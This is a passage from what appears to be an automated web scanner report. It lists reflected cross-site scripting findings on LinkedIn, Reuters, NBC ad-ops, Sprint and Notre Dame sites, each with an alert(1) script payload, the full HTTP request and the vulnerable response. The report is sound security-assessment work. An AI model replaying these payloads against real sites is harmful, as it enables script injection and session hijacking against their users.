...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/rd.nsf/rd?66e21"-alert(1)-"150c1b8488f=1");
} catch(err) {}</script>
...[SNIP]...

5.72. http://www.linkedin.com/countserv/count/share [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload f0f49<img%20src%3da%20onerror%3dalert(1)>1b27c3e5a24 was submitted in the url parameter. This input was echoed as f0f49<img src=a onerror=alert(1)>1b27c3e5a24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /countserv/count/share?url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903f0f49<img%20src%3da%20onerror%3dalert(1)>1b27c3e5a24 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"; visit=G

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:45:54 GMT
Content-Length: 182

IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/www.reuters.com\/article\/2011\/09\/03\/us-weather-football-idUSTRE78222D20110903f0f49<img src=a onerror=alert(1)>1b27c3e5a24"});

5.73. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nbcudigitaladops.com
Path:   /hosted/util/getRemoteDomainCookies.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload b935c<script>alert(1)</script>6522d81e549 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hosted/util/getRemoteDomainCookies.js?callback=__nbcadops_xasis.getRemoteDomainCookiesCallbackb935c<script>alert(1)</script>6522d81e549 HTTP/1.1
Host: www.nbcudigitaladops.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xa=n

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 152
Content-Type: application/javascript
ETag: "15f491-44-4aacd3f4ef780"
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Sun, 04 Sep 2011 00:52:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:52:42 GMT
Connection: close

__nbcadops_xasis.getRemoteDomainCookiesCallbackb935c<script>alert(1)</script>6522d81e549("xa=n; pers_cookie_insert_nbc_blogs_80=2227425856.20480.0000");

5.74. http://www.reuters.com/assets/commentsChild [articleId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/commentsChild

Issue detail

The value of the articleId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1582a"><script>alert(1)</script>fe132c51c05 was submitted in the articleId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/03/us-weather-football-idUSTRE78222D20110903&articleId=USTRE78222D201109031582a"><script>alert(1)</script>fe132c51c05&headline=Notre+Dame+football+stadium+cleared+due+to+lightning&channel=domesticNews&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 4901

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF01 <![endif]-->
<!--[if !IE]> token: 3d278813-504e-4191-9b77-555036e7e9b3 <
...[SNIP]...
<input type="hidden" name="article_id" value="USTRE78222D201109031582a"><script>alert(1)</script>fe132c51c05" />
...[SNIP]...

5.75. http://www.reuters.com/assets/commentsChild [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/commentsChild

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1018"><script>alert(1)</script>71adda7c438 was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/03/us-weather-football-idUSTRE78222D20110903&articleId=USTRE78222D20110903&headline=Notre+Dame+football+stadium+cleared+due+to+lightning&channel=domesticNewsf1018"><script>alert(1)</script>71adda7c438&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 5218

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF38 <![endif]-->
<!--[if !IE]> token: 0fe4c1fd-5429-477a-8e92-7320039c4b12 <
...[SNIP]...
<input type="hidden" name="channel" value="domesticNewsf1018"><script>alert(1)</script>71adda7c438" />
...[SNIP]...

5.76. http://www.reuters.com/assets/searchIntercept [blob parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/searchIntercept

Issue detail

The value of the blob request parameter is copied into the HTML document as plain text between tags. The payload f02e5<script>alert(1)</script>d14b997ec00 was submitted in the blob parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/searchIntercept?blob=notre%20dame%20footballf02e5<script>alert(1)</script>d14b997ec00 HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie; __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:00:17 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 4 Sep 2011 01:00:18 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 572

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF14 <![endif]-->
<!--[if !IE]> token: a723f467-3f78-4872-b9c9-ee09ff7f28a7 <
...[SNIP]...
<div class="searchTerm">"notre dame footballf02e5<script>alert(1)</script>d14b997ec00"</div>
...[SNIP]...

5.77. http://www.reuters.com/tracker/guid [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /tracker/guid

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ce90a%3balert(1)//6021deac1e7 was submitted in the cb parameter. This input was echoed as ce90a;alert(1)//6021deac1e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tracker/guid?cb=doTrack8497ce90a%3balert(1)//6021deac1e7 HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:46:33 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: text/javascript
Content-Length: 150

typeof doTrack8497ce90a;alert(1)//6021deac1e7==='function'&&doTrack8497ce90a;alert(1)//6021deac1e7({"userID":"8962b548-050e-4d67-833b-b346fcad4aac"});

5.78. https://www.sprint.net/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9afcf"><script>alert(1)</script>b449dded42e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9afcf"><script>alert(1)</script>b449dded42e=1 HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=sprint&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:01:59 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 16888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/?9afcf"><script>alert(1)</script>b449dded42e=1" />
...[SNIP]...

5.79. https://www.sprint.net/external_videos/pages.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /external_videos/pages.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5e94"><script>alert(1)</script>4a03023a012 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /external_videosd5e94"><script>alert(1)</script>4a03023a012/pages.php HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:28:13 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 9557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/external_videosd5e94"><script>alert(1)</script>4a03023a012/pages.php" />
...[SNIP]...

5.80. https://www.sprint.net/external_videos/pages.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /external_videos/pages.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be96b"><script>alert(1)</script>94dcba76cca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /external_videos/pages.phpbe96b"><script>alert(1)</script>94dcba76cca HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:28:22 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 9557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/external_videos/pages.phpbe96b"><script>alert(1)</script>94dcba76cca" />
...[SNIP]...

5.81. https://www.sprint.net/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4efbd"><script>alert(1)</script>b6a71b50e9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php4efbd"><script>alert(1)</script>b6a71b50e9c HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:28:14 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 9541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/index.php4efbd"><script>alert(1)</script>b6a71b50e9c" />
...[SNIP]...

5.82. https://www.sprint.net/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a007"><script>alert(1)</script>e5b7ce49e23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?4a007"><script>alert(1)</script>e5b7ce49e23=1 HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:28:03 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 16897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/index.php?4a007"><script>alert(1)</script>e5b7ce49e23=1" />
...[SNIP]...

5.83. https://www.sprint.net/min/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /min/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0b69"><script>alert(1)</script>f9addac0cb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mine0b69"><script>alert(1)</script>f9addac0cb8/?f=css/global.css,compass_ui/css/smoothness/jquery-ui-1.8.2.custom.css,compass_ui/gallery/s3Slider_mod.css HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:03:12 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/mine0b69"><script>alert(1)</script>f9addac0cb8/" />
...[SNIP]...

5.84. http://www.und.com/allaccess/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /allaccess/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9585"><script>alert(1)</script>1f949ff99a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /allaccesse9585"><script>alert(1)</script>1f949ff99a/ HTTP/1.1
Host: www.und.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:27:58 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/allaccesse9585"><script>alert(1)</script>1f949ff99a/','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.85. http://www.und.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 534b1"><script>alert(1)</script>ea040958e16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico534b1"><script>alert(1)</script>ea040958e16 HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: www.und.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:48 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/favicon.ico534b1"><script>alert(1)</script>ea040958e16','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.86. http://www.und.com/gametracker/launch/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /gametracker/launch/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71bd4"><script>alert(1)</script>f100731304a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gametracker71bd4"><script>alert(1)</script>f100731304a/launch/ HTTP/1.1
Host: www.und.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:28:54 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/gametracker71bd4"><script>alert(1)</script>f100731304a/launch/','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.87. http://www.und.com/gametracker/launch/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /gametracker/launch/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed840"><script>alert(1)</script>a1f143f8f78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gametracker/launched840"><script>alert(1)</script>a1f143f8f78/ HTTP/1.1
Host: www.und.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:28:55 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/gametracker/launched840"><script>alert(1)</script>a1f143f8f78/','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.88. http://www.und.com/nd.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /nd.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 589ca"><script>alert(1)</script>85d9b50e458 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nd.ico589ca"><script>alert(1)</script>85d9b50e458 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:54:32 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/nd.ico589ca"><script>alert(1)</script>85d9b50e458','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.89. http://www.und.com/photogallery/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /photogallery/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 141e8"><script>alert(1)</script>d67fe75be5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /photogallery141e8"><script>alert(1)</script>d67fe75be5d/ HTTP/1.1
Host: www.und.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:27:59 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

